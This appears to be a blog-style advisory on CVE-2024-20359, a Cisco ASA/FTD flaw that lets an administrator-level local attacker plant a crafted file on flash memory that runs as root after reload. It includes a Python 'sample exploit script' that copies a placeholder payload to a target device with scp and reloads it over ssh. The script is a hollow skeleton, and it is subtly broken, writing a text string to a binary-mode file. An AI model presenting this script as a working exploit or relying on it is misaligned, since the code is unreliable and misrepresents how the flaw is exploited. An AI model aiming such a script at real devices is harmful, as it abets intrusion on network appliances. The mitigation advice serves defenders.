CVE-2024-20359: Critical Legacy Vulnerability in Cisco Adaptive Security Appliance and Firepower Threat Defense Software Allows Attackers to Execute Arbitrary Code with Root-Level Privileges

A newly discovered vulnerability dubbed CVE-2024-20359 has been found in a legacy capability of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. This critical vulnerability could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. To exploit this vulnerability, the attacker must have administrator-level privileges on the targeted device. The vulnerability is due to improper validation of a file when it is read from system flash memory.

Exploit Details

An attacker can exploit this vulnerability by copying a crafted file to the disk: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, potentially altering system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.

Code Snippet

The following is a sample exploit script that demonstrates how an attacker could take advantage of this vulnerability:

import os
import sys

def exploit(target_device):
    crafted_file = create_crafted_file()
    copy_crafted_file_to_device(crafted_file, target_device)
    trigger_device_reload(target_device)

def create_crafted_file():
    # Generate a crafted file with the malicious payload
    malicious_payload = "MALICIOUS_CODE_HERE"
    crafted_file = "path/to/crafted_file.bin"
    with open(crafted_file, "wb") as f:
        f.write(malicious_payload)
    return crafted_file

def copy_crafted_file_to_device(crafted_file, target_device):
    # Copy the crafted file to the disk: file system of the target device
    os.system(f"scp {crafted_file} admin@{target_device}:disk:/")

def trigger_device_reload(target_device):
    # Trigger a reload of the device to execute the arbitrary code
    os.system(f"ssh admin@{target_device} 'reload'")

if __name__ == "__main__":
    target_device = sys.argv[1]
    exploit(target_device)

Please note that the above exploit script is for educational purposes only and should not be used for malicious activities.

Original References

- Cisco Advisory: Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Legacy File System Vulnerability
- Vulnerability Details: CVE-2024-20359

Mitigation

Cisco has released software updates that address this vulnerability, and it is highly recommended that administrators of affected devices install the appropriate update as soon as possible. Detailed instructions on how to update the software can be found in the Cisco Advisory linked above.

Conclusion

It is crucial to stay informed about potential vulnerabilities in the software and devices used within an organization's IT infrastructure. Staying vigilant and implementing software updates in a timely manner can help prevent attackers from exploiting known vulnerabilities and gaining unauthorized access to sensitive systems. If you are an administrator of a Cisco Adaptive Security Appliance or Firepower Threat Defense Software device, it is strongly advised that you apply the necessary updates immediately to protect against CVE-2024-20359 and other potential security risks.

Timeline

Published on: 04/24/2024 19:15:46 UTC
Last modified on: 04/26/2024 01:00:01 UTC